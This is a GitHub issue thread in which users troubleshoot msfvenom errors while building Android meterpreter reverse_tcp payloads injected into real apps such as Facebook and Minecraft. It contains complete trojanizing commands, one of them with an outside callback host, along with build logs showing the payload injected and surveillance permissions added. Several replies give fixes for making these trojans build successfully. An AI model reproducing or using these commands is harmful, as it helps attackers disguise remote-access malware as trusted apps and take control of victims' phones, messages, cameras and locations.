### ISSUE TITLE
Getting error as "Error: Malformed version number string 2.4.1" in msfvenom

### ISSUE THREAD

**Issue by gulammustufa** [rapid7/metasploit-framework#13231]
I am using kali linux. I am getting error after executing the following command in the terminal.

msfvenom -x '/root/Downloads/facebook.apk' -p android/meterpreter/reverse_tcp LHOST=fw1.sshreach.me LPORT=10575 /root/Downloads/hacked.apk

After executing the command on the terminal I am getting error as below.
Error: Malformed version number string 2.4.1

I have also attached the screenshot.

After doing some research, I found that it could be issue of APKTOOL. Then I created issue for it. Below is the URL. 
https://github.com/iBotPeaches/Apktool/issues/2325

But they closed issue by saying that it is not their issue.
![Screenshot 2020-04-11 13:11:42](https://user-images.githubusercontent.com/22556970/79042396-1482ce00-7be7-11ea-92e3-76a8973b1b08.png)

**Comment by InsalataCondita** [comment]
Same problem here, I've also tried to install different versions of apktool but nothing changes

**Comment by Laurent-Andrieu** [comment]
It's been 3 days I'm going through every problem possible, I did rebuild apps and now I can't anymore.

**Comment by TheAlperenCv** [comment]
Hello mustafa  fixed this problem 

Fix commands

apt-get install zipalign -y 
apt-get install default-jre -y
apt-get install  default-jdk -y
you will install apktool to manuel
sudo msfvenom -x minecraft.apk -p $your choosed payload set LHOST=$your choosed ip set LPORT=$your choosed port -o trojanminecraft.apk

i hope i helped you
best regards :)

**Comment by TheAlperenCv** [comment]
Merhaba türk kardeşlerim Sizde yukarıdakı gibi bir gıcık hata alıyorsanız çözüm burda beni takip edin=>

Kullanacığınız komutlar:>
apt-get install zipalign -y
apt-get install default-jdk -y
apt-get install default-jre -y
apktool'u manuel olarak kuracaksınız 
Kullanımı:
sudo msfvenom -x minecraft.apk -p android/meterpreter/reverse_tcp set LHOST=$uzakbağlantıip set LPORT= $uzakbağlantıportu -o trojanminecraft.apk
umarım sizlere yardımcı olmuşumdur
lütfen kötü niyetli kullanmayınız
Saygılarımla
TheAlperencv

**Comment by defaultraw** [comment]
Not working for me

> Hello mustafa i fixed this problem
> 
> Fix commands
> 
> apt-get install zipalign -y
> apt-get install default-jre -y
> apt-get install default-jdk -y
> you will install apktool to manuel
> sudo msfvenom -x minecraft.apk -p $your choosed payload set LHOST=$your choosed ip set LPORT=$your choosed port -o trojanminecraft.apk
> 
> i hope i helped you
> best regards :)

**Comment by MouradRashwan** [comment]
Run these commands will fix the problem:

_SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
unset _JAVA_OPTIONS
alias='java "$_SILENT_JAVA_OPTIONS"'

**Comment by Abdulmanan0315** [comment]
Here is a working solution i wrote:
https://stackoverflow.com/a/61420064/10114772

**Comment by sudo-WearTherinG** [comment]
whats happen insted && whats actually should happend??
code 1 error
root@kali:~/Desktop/temp# msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=192.168.4##.### lport=4444 -o rooterX.apk
Using APK template: example.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.1
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
{you are at this point}
whats SOLUTION
add sudo in beginning{ even if you are superuser

EXAMPLE
sudo msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=192.168.##.##lport=4444 -o rooterX.apk
code ouput:
Using APK template: example.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.secondlemon.whatsdogpremium.xwseo
[*] Loading /tmp/d20200430-12142-1b708v/original/smali/com/secondlemon/whatsdogpremium/App.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20200430-12142-1b708v/output.apk
[*] Signing /tmp/d20200430-12142-1b708v/output.apk
[*] Aligning /tmp/d20200430-12142-1b708v/output.apk
Payload size: 4623023 bytes
Saved as: rooterX.apk

EASY

**Comment by TheAlperenCv** [comment]
i write bash script for you

**Comment by RoopTarun** [comment]
> whats happen insted && whats actually should happend??
> code 1 error
> root@kali:~/Desktop/temp# msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=192.168.4##.### lport=4444 -o rooterX.apk
> Using APK template: example.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> Error: Malformed version number string 2.4.1
> Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
> {you are at this point}
> whats SOLUTION
> add sudo in beginning{ even if you are superuser
> 
> EXAMPLE
> sudo msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=192.168.##.##lport=4444 -o rooterX.apk
> code ouput:
> Using APK template: example.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [_] Creating signing key and keystore.. [_] Decompiling original APK..
> [_] Decompiling payload APK.. [_] Locating hook point..
> [_] Adding payload as package com.secondlemon.whatsdogpremium.xwseo [_] Loading /tmp/d20200430-12142-1b708v/original/smali/com/secondlemon/whatsdogpremium/App.smali and injecting payload..
> [_] Poisoning the manifest with meterpreter permissions.. [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Rebuilding apk with meterpreter injection as /tmp/d20200430-12142-1b708v/output.apk
> [_] Signing /tmp/d20200430-12142-1b708v/output.apk [_] Aligning /tmp/d20200430-12142-1b708v/output.apk
> Payload size: 4623023 bytes
> Saved as: rooterX.apk
> 
> EASY

why bro like this sudo by just giving super user acess why its working

**Comment by gulammustufa** [comment]
After using the sudo not getting the error.
so closing the issue. 
Thanks to all for your support.

**Comment by Noozzles** [comment]
you just add
-a java --platform android
so
from msfvenom -x '/root/Downloads/facebook.apk' -p android/meterpreter/reverse_tcp LHOST=fw1.sshreach.me LPORT=10575 /root/Downloads/hacked.apk
to msfvenom -a java --platform android -x '/root/Downloads/facebook.apk' -p android/meterpreter/reverse_tcp LHOST=fw1.sshreach.me LPORT=10575 /root/Downloads/hacked.apk

**Comment by pratyushk403** [comment]
> I got the error at the end
> 
> sudo msfvenom -x '/root/Downloads/facebook_lite_v212.0.0.6.106.apk' -p android/meterpreter/reverse_tcp LHOST=#.#.#.# LPORT=#### -o /root/FaceBookLite.apk
> Using APK template: /root/Downloads/facebook_lite_v212.0.0.6.106.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [_] Creating signing key and keystore.. [_] Decompiling original APK..
> [_] Decompiling payload APK.. [_] Locating hook point..
> [_] Adding payload as package com.facebook.lite.keenr [_] Loading /tmp/d20200825-1925-1f1ojhc/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
> [_] Poisoning the manifest with meterpreter permissions.. [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [*] Rebuilding apk with meterpreter injection as /tmp/d20200825-1925-1f1ojhc/output.apk
> [-] I: Using Apktool 2.4.1-dirty
> I: Checking whether sources has changed...
> I: Smaling smali folder into classes.dex...
> I: Checking whether resources has changed...
> I: Building resources...
> W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/linux/aapt_64 (defaulting to $PATH binary)
> W: res/mipmap-anydpi-v26/$ic_launcher_foreground__0.xml: Invalid file name: must contain only [a-z0-9_.]
> brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [aapt, p, --min-sdk-version, 15, --target-sdk-version, 28, --version-code, 239306324, --version-name, 212.0.0.6.106, --no-version-vectors, -F, /tmp/APKTOOL9976567026301950362.tmp, -0, assets/lib/libs.xzs, -0, assets/secondary-program-dex-jars/store-0.dex.spk.xz, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20200825-1925-1f1ojhc/original/res, -M, /tmp/d20200825-1925-1f1ojhc/original/AndroidManifest.xml]
> Error: Unable to rebuild apk with apktool
> 
> Can anybody please help me.

same error i am getting

**Comment by sudo-WearTherinG** [comment]
Latest version of facebook won't even let you decompile it.
Some apps prevent from decompiling itself because apk devlopers.
Or try to manually bind rat with apk.
With Older versions or some other applications

**Comment by Slayking1965** [comment]
> whats happen insted && whats actually should happend??
> code 1 error
> root@kali:~/Desktop/temp# msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=192.168.4##.### lport=4444 -o rooterX.apk
> Using APK template: example.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> Error: Malformed version number string 2.4.1
> Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
> {you are at this point}
> whats SOLUTION
> add sudo in beginning{ even if you are superuser
> 
> EXAMPLE
> sudo msfvenom -x example.apk -p android/meterpreter/reverse_tcp lhost=192.168.##.##lport=4444 -o rooterX.apk
> code ouput:
> Using APK template: example.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [_] Creating signing key and keystore.. [_] Decompiling original APK..
> [_] Decompiling payload APK.. [_] Locating hook point..
> [_] Adding payload as package com.secondlemon.whatsdogpremium.xwseo [_] Loading /tmp/d20200430-12142-1b708v/original/smali/com/secondlemon/whatsdogpremium/App.smali and injecting payload..
> [_] Poisoning the manifest with meterpreter permissions.. [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Adding
> [_] Adding [_] Rebuilding apk with meterpreter injection as /tmp/d20200430-12142-1b708v/output.apk
> [_] Signing /tmp/d20200430-12142-1b708v/output.apk [_] Aligning /tmp/d20200430-12142-1b708v/output.apk
> Payload size: 4623023 bytes
> Saved as: rooterX.apk
> 
> EASY

Thank you man, you saved my time 👍

**Comment by Viniburn00** [comment]
root@vini:~# unset _JAVA_OPTIONS

**Comment by meetmanmeet** [comment]
> Run these commands will fix the problem temporary or you can write them to bachrc :
> 
> _SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS"
> unset _JAVA_OPTIONS
> alias='java "$_SILENT_JAVA_OPTIONS"'

it worked for me

**Comment by ChillVibesMushroom** [comment]
The error I receive is that the apk won't merge hahaha

**Comment by ChillVibesMushroom** [comment]
> The error I receive is that the apk won't merge hahaha

all it sends is the original payload and I am tired as fuck

**Comment by Radhejjjjj** [comment]
![Uploading Screenshot_2022-10-15-06-47-40-645_com.termux.jpg…]()
Help

**Comment by Andreaz254** [comment]
just remove the current version you have by sudo apt remove apktool then download and install apktool version 2.92.
